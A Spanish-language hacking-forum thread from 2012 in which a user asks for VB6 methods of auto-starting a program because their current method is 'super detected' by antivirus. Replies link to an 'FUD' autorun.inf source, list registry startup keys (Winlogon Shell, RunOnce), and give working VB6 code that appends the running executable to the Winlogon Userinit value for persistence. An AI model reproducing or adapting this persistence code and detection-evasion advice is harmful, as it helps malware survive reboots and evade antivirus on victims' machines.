Foro de elhacker.net

Programación => Programación Visual Basic => Mensaje iniciado por: MrSatan en 28 Diciembre 2012, 22:17 pm


Título: Ayuda AutoRuns
Publicado por: MrSatan en 28 Diciembre 2012, 22:17 pm
 Hola queria saber si me darian algunas formas de crear autoruns desde vb6 ya que la que uso es muy simple y super detectada por eso quiero saber si hay otras formas...

Gracias.

Título: Re: Ayuda AutoRuns
Publicado por: BlackZeroX en 28 Diciembre 2012, 23:42 pm
.
[Src] Autorun.inf FUD (Pensaste que ya no servia LOL). (http://foro.elhacker.net/analisis_y_diseno_de_malware/src_autoruninf_fud_pensaste_que_ya_no_servia_lol-t294797.0.html)

Dulces Lunas!¡.

Título: Re: Ayuda AutoRuns
Publicado por: MrSatan en 29 Diciembre 2012, 03:41 am
Cita de: BlackZeroX (Astaroth) en 28 Diciembre 2012, 23:42 pm
.
[Src] Autorun.inf FUD (Pensaste que ya no servia LOL). (http://foro.elhacker.net/analisis_y_diseno_de_malware/src_autoruninf_fud_pensaste_que_ya_no_servia_lol-t294797.0.html)

Dulces Lunas!¡.

Muchas gracias por comentar esa también la conocia ahora probe una que se crea en
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"    si alguno tiene otras y las quiere compartir me viene de 10.

un saludo.      

Título: Re: Ayuda AutoRuns
Publicado por: BlackZeroX en 29 Diciembre 2012, 08:39 am
.
@MrSatan
Existe un botón llamado Buscar!¡.

Aun así esta duda es mas sobre INFORMACIÓN que de código (independientemente del lenguaje).

Análisis y Diseño de Malware
[Recopilatorio] Herramientas, manuales y códigos de los usuarios (Construcción) (http://foro.elhacker.net/analisis_y_diseno_de_malware/recopilatorio_herramientas_manuales_y_codigos_de_los_usuarios_construccion-t255646.0.html).

Windows
F.A.Q. (http://foro.elhacker.net/windows/f_a_q-t101632.0.html)

No recuerdo donde leí lo de inicio por ActiveX, runonce (varios inicios por registro de windows), entre otros (puede que haya sido en el Sub-Foro de Windows o de Análisis de Diseño de Malware).

Dulces Lunas!¡.

Título: Re: Ayuda AutoRuns
Publicado por: Danyfirex en 29 Diciembre 2012, 17:52 pm
esta la hice hace tiempo no se como este de detecciones :S


Código
  1. Private Declare Function RegOpenKeyEx Lib "advapi32" Alias "RegOpenKeyExA" (ByVal HKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, ByRef phkResult As Long) As Long
  2. Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal HKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
  3. Private Declare Function RegCloseKey Lib "advapi32" (ByVal HKey As Long) As Long
  4.  
  5.  
  6. Private Const HKEY_CURRENT_USER = &H80000001
  7. Private Const HKEY_LOCAL_MACHINE = &H80000002
  8. Private Const KEY_WRITE = &H20006
  9. Private Const REG_SZ = 1
  10.  
  11.  
  12.  
  13. Private Sub Dosyayi_Baslangica_Ekle(ByVal HKey As Long, ByVal MKey As String, ByVal stringKeyVal As String, ByVal subkey As String)
  14. Dim HRKey As Long, StrB As String
  15. Dim retval As Long
  16.     retval = RegOpenKeyEx(HKey, subkey, 0, KEY_WRITE, HRKey)
  17.         If retval <> 0 Then
  18.             Exit Sub
  19.         End If
  20.     StrB = stringKeyVal & vbNullChar
  21.     retval = RegSetValueEx(HRKey, MKey, 0, REG_SZ, ByVal StrB, Len(StrB))
  22.     RegCloseKey HRKey
  23. End Sub
  24.  
  25. Private Sub Command1_Click()
  26.  
  27. Dim sMyPath As String
  28.  
  29. file = "C:\Users\Pink\Desktop\Anotador.exe"
  30. sMyPath = (App.Path & "\" & App.EXEName & ".exe")
  31. Call Dosyayi_Baslangica_Ekle(HKEY_LOCAL_MACHINE, "Userinit", "C:\Windows\system32\userinit.exe," & sMyPath, "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon")
  32.  
  33. End Sub


Saludos


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines